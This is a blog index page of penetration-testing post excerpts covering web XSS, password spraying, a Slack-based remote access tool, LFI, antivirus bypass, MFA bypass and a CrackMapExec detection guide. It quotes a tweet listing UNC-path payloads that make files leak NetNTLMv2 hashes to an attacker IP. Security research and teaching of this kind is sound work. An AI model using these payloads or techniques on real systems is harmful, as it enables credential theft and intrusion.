Recently I discovered multiple high severity vulnerabilities in Selectica Contract Lifecycle Management (SCLM) version 5.4. Cross-site Scripting (XSS) There was no shortage of XSS in this app. Here’s an example from a light scan with Burp Suite: This is pretty easy to leverage for account takeover, even more so because the HTTPOnly flag was not…
Password Spraying Dell SonicWALL Virtual Office
Today I came across a Dell SonicWALL virtual office login page. Typically what I will do when I see something like this is I will perform a password spray against it based on usernames I have collected from Open Source Intelligence (OSINT) during the reconnaissance phase of my pentest. Typically I will not try to…
Introducing Slackor, a Remote Access Tool Using Slack as a C2 Channel
As a penetration tester at Coalfire Labs, I frequently use exploitation frameworks such as Metasploit or PowerShell Empire to perform post-exploitation actions on compromised endpoints. While anti-virus (AV) bypass and detection avoidance is often trivial in all but the most mature environments, detections from AV have caused me to look toward custom tooling to mitigate…
Understanding UNC paths, SMB, and WebDAV
While browsing Twitter recently I came upon a tweet that I found to be very interesting: Did know that u can steal #NetNTLMv2 by changing #SMB port to bypass sec-things: net use \\1.2.3.4@80\tor pdf : /F (\\\\IP@80\\t)or dubdoc : ///IP@80/tor doc: Target="file://IP@80/t.dotx"or lnk: URL=file://IP@80/t.htmor: IconFile=\\IP@80\t.ico#RedTeam #NTLM cc @ddouhine — V (@mynameisv__) April 30, 2019 I…
Exploiting Genuitec Secure Delivery Center (SDC) < Version 5.4.7 (Local File Inclusion)
A local file inclusion vulnerability exists in Genuitec Secure Delivery Center (SDC) in versions lower than 5.4.7. This vulnerability can be exploited to gain admin access to the application. To Exploit the LFI, an attacker can insert a series of “..\”‘s into the URL to move up the directory structure. The attacker will need to…
Popping shells on Splunk
Every now and then when testing networks, I run into Splunk. Splunk is a software platform to search, analyze and visualize data. It is super useful for all sorts of purposes. As a pentester, it can be useful as it often contains all sorts of data, some of which may be sensitive. Gaining access to…
Dark Tip: Avoiding SSL Inspection on Palo Alto Firewalls
When I stood up a Palo Alto firewall to do research for my blog post on The Dangers of Client Probing on Palo Alto Firewalls, I also found something interesting in the UI. Under Device -> Certificate Management -> SSL Decryption Exclusion there was a list of domains that by default were exempt from SSL…
The Dangers of Client Probing on Palo Alto Firewalls
While performing a routine internal penetration test, I began the assessment by running Responder in analyze mode just to get an idea of what was being sent over broadcast. Much to my surprise, I found that shortly after running it, a hash was captured by Responder’s SMB listener. This hash belonged to an account named…
Bypassing Duo Two-Factor Authentication (Fail Open)
Often times while performing penetration tests it may be helpful to connect to a system via the Remote Desktop Protocol (RDP). I typically use rdesktop or xfreerdp to connect to host once I have obtained credentials to do all sorts of things such as use Active Directory Users and Computers or SQL Management Studio. One…
Executing Meterpreter in Memory on Windows 10 and Bypassing AntiVirus (Part 2)
Cunningham’s Law states “the best way to get the right answer on the internet is not to ask a question; it’s to post the wrong answer.” While I haven’t been the target of any negative feedback, after posting my blog post: Executing Meterpreter in Memory on Windows 10 and Bypassing AntiVirus, I’ve realized that some…
Executing Meterpreter in Memory on Windows 10 and Bypassing AntiVirus
Recently I read the article on the Coalfire Blog about executing an obfuscated PowerShell payload using Invoke-CradleCrafter. This was very useful, as Windows Defender has upped its game lately and is now blocking Metasploit’s Web Delivery module. I wanted to demonstrate an alternate way to achieve the same goal, with the intention of not dropping…
Ducky-in-the-middle: Injecting keystrokes into plaintext protocols
This was my first presentation of my talk “Ducky-in-the-Middle: Injecting Keystrokes into Plaintext Protocols”. If you want to catch this live, I’ll be presenting as Bsides Denver, NolaCon, and DEF CON: Packet Hacking Village. Update: NolaCon Presentation
Microsoft Word upload to Stored XSS
Anytime I find a file upload form I test it. Best case scenario is that I can upload a reverse shell in a scripting language available on the webserver. If the application is running in PHP or ASP for example, it becomes quite easy. If I can’t get a backdoor uploaded, I will attempt to…
Exploiting complex XSS payloads in a constrained parameter
When identifying XSS (Cross-site Scripting) within a target application, I often choose to go beyond a proof-of-concept exploit such as popping an alert box. I find that the best payloads are those which exploit functionality within the application which require authentication, such as adding a new user when logged in as an administrator. Other useful…
Bsides Puerto Rico 2017-2018 Presentation
Here are the slides and video from my presentation at Bsides Puerto Rico 2017-2018. Bsides Puerto Rico 2017-2018 from Esteban Rodriguez
Raining shells on Linux environments with Hwacha
If you’ve read previous posts on here you know that I am a big fan of CrackMapExec. One of the things that makes it particularly useful is I can run a payload against multiple targets at once. A variety of payloads exist, though my favorites are “mimikatz” and “met_inject”, which executes Meterpreter shellcode on a…
Exploiting blind Java deserialization with Burp and Ysoserial
While performing a web application penetration test, I stumbled upon a parameter with some base64 encoded data within a POST parameter. Curious as to what it was, I send it over to Burp decoder. After two rounds of URL decoding and one round of Base64 decoding, I had what appeared to be a serialized Java…
Detecting CrackMapExec (CME) with Bro, Sysmon, and Powershell logs
CrackMapExec is a popular tool that is used by attackers to move laterally throughout an environment. I use it personally on my penetration tests, as I’ve found that it does a really good job at moving from system to system without detection. My goal with this blog post is to give defenders some techniques on…
VulnHub Walkthrough: RickdiculouslyEasy 1
A new Boot2Root came online on VulnHub and it looked like fun. This one is themed around a cartoon show called “Rick and Morty”. First order of business for me is to run an Nmap scan. I like to do a full TCP port scan with service enumeration. root@kali:~# nmap 10.0.1.9 -Pn -p- -sV Starting…
How to Burp Good
Burp Suite is one of my favorite tools for web application testing. The feature set is rich, and anything that it does not do by default can usually be added with an extension. There are a few things however, that while they exist in Burp Suite, they are not completely intuitive. Here are a few…
Categories
n00py Blog
- Protected: Aw, Sugar. Critical Vulnerabilities in SugarWOD
- The SOCKS We Have at Home
- Bypassing Amazon Kids+ Parental Controls
- Bypassing Okta MFA Credential Provider for Windows
- CactusCon 2023: BloodHound Unleashed
- Exploiting Resource Based Constrained Delegation (RBCD) with Pure Metasploit
- Practical Attacks against NTLMv1
- Password Spraying RapidIdentity Logon Portal
- Manipulating User Passwords Without Mimikatz
- Unauthenticated Dumping of Usernames via Cisco Unified Call Manager (CUCM)
December 2024 M T W T F S S 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 Archives
- October 2024
- January 2024
- April 2023
- February 2023
- January 2023
- October 2022
- March 2022
- January 2022
- September 2021
- May 2021
- December 2020
- August 2020
- May 2020
- February 2020
- January 2020
- December 2019
- June 2019
- March 2019
- October 2018
- August 2018
- June 2018
- April 2018
- March 2018
- January 2018
- December 2017
- November 2017
- October 2017
- September 2017
- August 2017
- June 2017
- April 2017
- March 2017
- January 2017
- October 2016